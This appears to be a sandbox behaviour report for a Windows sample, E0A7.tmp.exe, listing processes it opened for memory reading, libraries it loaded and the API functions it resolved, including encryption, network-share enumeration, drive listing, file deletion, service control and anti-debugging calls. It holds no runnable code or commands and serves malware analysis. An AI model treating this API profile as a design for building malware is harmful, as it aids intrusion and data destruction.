Open	c:\program files\microsoft sql server compact edition\dumb.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows sidebar\rainbowallowingsb.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\msbuild\cowboy_mh.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\microsoft office\poison-hormone-geographical.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\microsoft visual studio 8\crisis seats.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\java\max poker.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft sql server compact edition\amendedbattlefield.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft analysis services\z stan.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\conhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\mozilla firefox\booty pas td.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\common files\origins-capability-snow.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\dvd maker\defines.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft sync framework\collinstuition.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\uninstall information\beside-denmark.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\wbem\wmiprvse.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\sppsvc.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn

Module (314)

Operation	Module	Additional Information	Count	Logfile
Load	kernel32.dll	base_address = 0x76c20000	3	Fn
Load	RPCRT4.dll	base_address = 0x75ee0000	1	Fn
Load	MPR.dll	base_address = 0x74b30000	1	Fn
Load	WININET.dll	base_address = 0x753d0000	1	Fn
Load	WINMM.dll	base_address = 0x74af0000	1	Fn
Load	SHLWAPI.dll	base_address = 0x75340000	1	Fn
Load	KERNEL32.dll	base_address = 0x76c20000	1	Fn
Load	USER32.dll	base_address = 0x74f40000	1	Fn
Load	ADVAPI32.dll	base_address = 0x74d40000	1	Fn
Load	SHELL32.dll	base_address = 0x75fd0000	1	Fn
Load	ole32.dll	base_address = 0x755e0000	1	Fn
Load	OLEAUT32.dll	base_address = 0x75220000	1	Fn
Load	IPHLPAPI.DLL	base_address = 0x74ad0000	1	Fn
Load	WS2_32.dll	base_address = 0x75bc0000	1	Fn
Load	DNSAPI.dll	base_address = 0x74a80000	1	Fn
Load	CRYPT32.dll	base_address = 0x759b0000	1	Fn
Load	msvcr100.dll	base_address = 0x74900000	1	Fn
Load	Psapi.dll	base_address = 0x75140000	1	Fn
Load	Shell32.dll	base_address = 0x75fd0000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x76c20000	14	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\e0a7.tmp.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\E0A7.tmp.exe, size = 260	2	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\e0a7.tmp.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\E0A7.tmp.exe, size = 1024	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x76c34f2b	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x76c31252	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x76c34208	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsFree, address_out = 0x76c3359f	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EncodePointer, address_out = 0x77170fcb	9	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DecodePointer, address_out = 0x77169d35	4	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessorFeaturePresent, address_out = 0x76c35235	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalAlloc, address_out = 0x76c3588e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualProtect, address_out = 0x76c3435f	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryA, address_out = 0x76c349d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x76c31856	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x76c3186e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExA, address_out = 0x76c33519	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x76c4d802	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x76c37a10	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetErrorMode, address_out = 0x76c31b00	2	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = RpcStringFreeW, address_out = 0x75f01635	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidToStringW, address_out = 0x75f21ee5	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidToStringA, address_out = 0x75f5d918	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = RpcStringFreeA, address_out = 0x75f23fc5	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidCreate, address_out = 0x75eff48b	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetCloseEnum, address_out = 0x74b32dd6	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetOpenEnumW, address_out = 0x74b32f06	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetEnumResourceW, address_out = 0x74b33058	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x753eab49	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlW, address_out = 0x7544be5c	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x753eb406	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlA, address_out = 0x754130f1	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpQueryInfoW, address_out = 0x753f5c75	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x753ff18e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenW, address_out = 0x753f9197	1	Fn
Get Address	c:\windows\syswow64\winmm.dll	function = timeGetTime, address_out = 0x74af26e0	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindExtensionW, address_out = 0x7535a1b9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindFileNameW, address_out = 0x7535bb71	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x75353248	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsW, address_out = 0x753545bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendW, address_out = 0x753581ef	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendA, address_out = 0x7534d65e	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsA, address_out = 0x7537ad1a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x76c3110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsFree, address_out = 0x76c33587	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineW, address_out = 0x76c35223	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileA, address_out = 0x76c353c6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x76c34435	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x76c317d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenA, address_out = 0x76c35a4b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x76c334c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x76c3103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointerEx, address_out = 0x76c4c807	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryW, address_out = 0x76c34259	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x76c31136	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDrives, address_out = 0x76c35371	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x76c31282	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeA, address_out = 0x76c4ef75	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x76c31986	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemDirectoryW, address_out = 0x76c35063	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x76c3170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryW, address_out = 0x76c3492b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x76c310ff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x76c5830d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FormatMessageW, address_out = 0x76c34620	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpynW, address_out = 0x76c5d556	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessA, address_out = 0x76c31072	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x76c33ed3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x76c33f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatA, address_out = 0x76c52b7a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentVariableA, address_out = 0x76c333a0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpW, address_out = 0x76c35929	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x76c3192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenW, address_out = 0x76c31700	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x76c3469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetShortPathNameA, address_out = 0x76c5594d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSizeEx, address_out = 0x76c359e2	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x76c311c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x76c311a9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x76c31222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MoveFileW, address_out = 0x76c49af0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindClose, address_out = 0x76c34442	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32FirstW, address_out = 0x76c58baf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalAlloc, address_out = 0x76c3168c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventW, address_out = 0x76c3183e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameA, address_out = 0x76c314b1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32NextW, address_out = 0x76c5896c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatW, address_out = 0x76c5828e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexA, address_out = 0x76c34c6b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FatalAppExitA, address_out = 0x76cb4691	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x76c5735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x76c31410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x76c389b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x76c32d3c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyW, address_out = 0x76c53102	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileA, address_out = 0x76c35444	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyA, address_out = 0x76c52a9d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetPriorityClass, address_out = 0x76c4cf28	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x76c334b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetComputerNameW, address_out = 0x76c3dd0e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetExitCodeProcess, address_out = 0x76c4174d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x76c34950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalFree, address_out = 0x76c35558	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersion, address_out = 0x76c34467	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryA, address_out = 0x76c5d526	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x76c334d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsSetValue, address_out = 0x76c314fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsGetValue, address_out = 0x76c311e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsAlloc, address_out = 0x76c349ad	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetUnhandledExceptionFilter, address_out = 0x76c387c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnhandledExceptionFilter, address_out = 0x76c5772f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeEnvironmentStringsW, address_out = 0x76c351cb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentStringsW, address_out = 0x76c351e3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x76c311f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = QueryPerformanceCounter, address_out = 0x76c31725	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStartupInfoW, address_out = 0x76c34d40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x771645f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeZoneInformation, address_out = 0x76c3465a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RaiseException, address_out = 0x76c358a6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStringTypeW, address_out = 0x76c31946	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapSize, address_out = 0x77163002	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryExW, address_out = 0x76c3495d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x7715e026	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoW, address_out = 0x76c33c42	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocale, address_out = 0x76c4ce46	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLCID, address_out = 0x76c33da5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesW, address_out = 0x76cb425f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatW, address_out = 0x76c534d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatW, address_out = 0x76c4f481	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringW, address_out = 0x76c33bca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringW, address_out = 0x76c317b9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleCP, address_out = 0x76cd7bff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleMode, address_out = 0x76c31328	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x77171f6e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetStdHandle, address_out = 0x76cb454f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEndOfFile, address_out = 0x76c4ce2e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStdHandle, address_out = 0x76c351b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileType, address_out = 0x76c33531	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleExW, address_out = 0x76c34a6f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteConsoleW, address_out = 0x76c57aca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadConsoleW, address_out = 0x76cd739a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OutputDebugStringW, address_out = 0x76c5d1d4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleCtrlHandler, address_out = 0x76c38a09	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RtlUnwind, address_out = 0x76c5d1c3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77152270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x771522b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AreFileApisANSI, address_out = 0x76cb40d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x76c314e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThreadId, address_out = 0x76c31450	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThread, address_out = 0x76c317ec	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCPInfo, address_out = 0x76c35189	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x76c314c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEnvironmentVariableA, address_out = 0x76c3e331	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTimeAsFileTime, address_out = 0x76c33509	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x76c31809	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreW, address_out = 0x76c4ca5a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetOEMCP, address_out = 0x76c5d1a1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetACP, address_out = 0x76c3179c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidCodePage, address_out = 0x76c34493	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x76c354ee	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x76c34a5d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadCursorW, address_out = 0x74f588f7	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x74f57809	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterClassExW, address_out = 0x74f5b17d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = ShowWindow, address_out = 0x74f60dfb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = IsWindow, address_out = 0x74f57136	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CreateWindowExW, address_out = 0x74f58a29	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = UpdateWindow, address_out = 0x74f63559	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DefWindowProcW, address_out = 0x771625dd	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageW, address_out = 0x74f605ba	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PostThreadMessageW, address_out = 0x74f58bff	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MessageBoxW, address_out = 0x74fafd3f	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageW, address_out = 0x74f5787b	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PostQuitMessage, address_out = 0x74f59abb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x74f59a55	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SendMessageW, address_out = 0x74f59679	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetMessageW, address_out = 0x74f578e2	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptGetHashParam, address_out = 0x74d4df7e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x74d4df14	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenSCManagerW, address_out = 0x74d4ca64	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenServiceW, address_out = 0x74d4ca4c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x74d4e124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetUserNameW, address_out = 0x74d5157a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptHashData, address_out = 0x74d4df36	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x74d514d6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x74d5469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyHash, address_out = 0x74d4df66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = ControlService, address_out = 0x74d67144	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x74d5468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptCreateHash, address_out = 0x74d4df4e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptEncrypt, address_out = 0x74d6779b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptImportKey, address_out = 0x74d4c532	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = QueryServiceStatus, address_out = 0x74d52a86	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x74d546ad	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CloseServiceHandle, address_out = 0x74d5369c	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetPathFromIDListW, address_out = 0x760617bf	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetSpecialFolderLocation, address_out = 0x7605e141	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = CommandLineToArgvW, address_out = 0x75fe9ee8	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteA, address_out = 0x76217078	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x75ff1e46	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitialize, address_out = 0x755fb636	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitializeSecurity, address_out = 0x75607259	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoUninitialize, address_out = 0x756286d3	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstance, address_out = 0x75629d0b	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 202, address_out = 0x7522fd6b	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 2, address_out = 0x75224642	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 9, address_out = 0x75223eae	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 8, address_out = 0x75223ed5	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 6, address_out = 0x75223e59	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 200, address_out = 0x75223f21	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 12, address_out = 0x75225dee	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 201, address_out = 0x75224af8	1	Fn
Get Address	c:\windows\syswow64\iphlpapi.dll	function = GetAdaptersInfo, address_out = 0x74ad9263	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 12, address_out = 0x75bcb131	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 11, address_out = 0x75bc311b	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 52, address_out = 0x75bd7673	1	Fn
Get Address	c:\windows\syswow64\dnsapi.dll	function = DnsQuery_W, address_out = 0x74a9572c	1	Fn
Get Address	c:\windows\syswow64\dnsapi.dll	function = DnsFree, address_out = 0x74a8436b	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptStringToBinaryA, address_out = 0x759e5d77	1	Fn
Get Address	c:\windows\syswow64\msvcr100.dll	function = atexit, address_out = 0x7491c544	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionEx, address_out = 0x76c34d28	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventExW, address_out = 0x76cb410b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreExW, address_out = 0x76cb4195	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadStackGuarantee, address_out = 0x76c3d31f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolTimer, address_out = 0x76c4ee7e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolTimer, address_out = 0x7717441c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolTimer, address_out = 0x7719c381	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolWait, address_out = 0x76c4f088	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolWait, address_out = 0x771805d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolWait, address_out = 0x7719ca24	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushProcessWriteBuffers, address_out = 0x77150b8c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessorNumber, address_out = 0x771a1e1d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalProcessorInformation, address_out = 0x76cb4761	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSymbolicLinkW, address_out = 0x76cacd11	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetDefaultDllDirectories, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesEx, address_out = 0x76cb424f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringEx, address_out = 0x76cb46b1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatEx, address_out = 0x76cc6676	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoEx, address_out = 0x76cb4751	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatEx, address_out = 0x76cc65f1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLocaleName, address_out = 0x76cb47c1	1	Fn
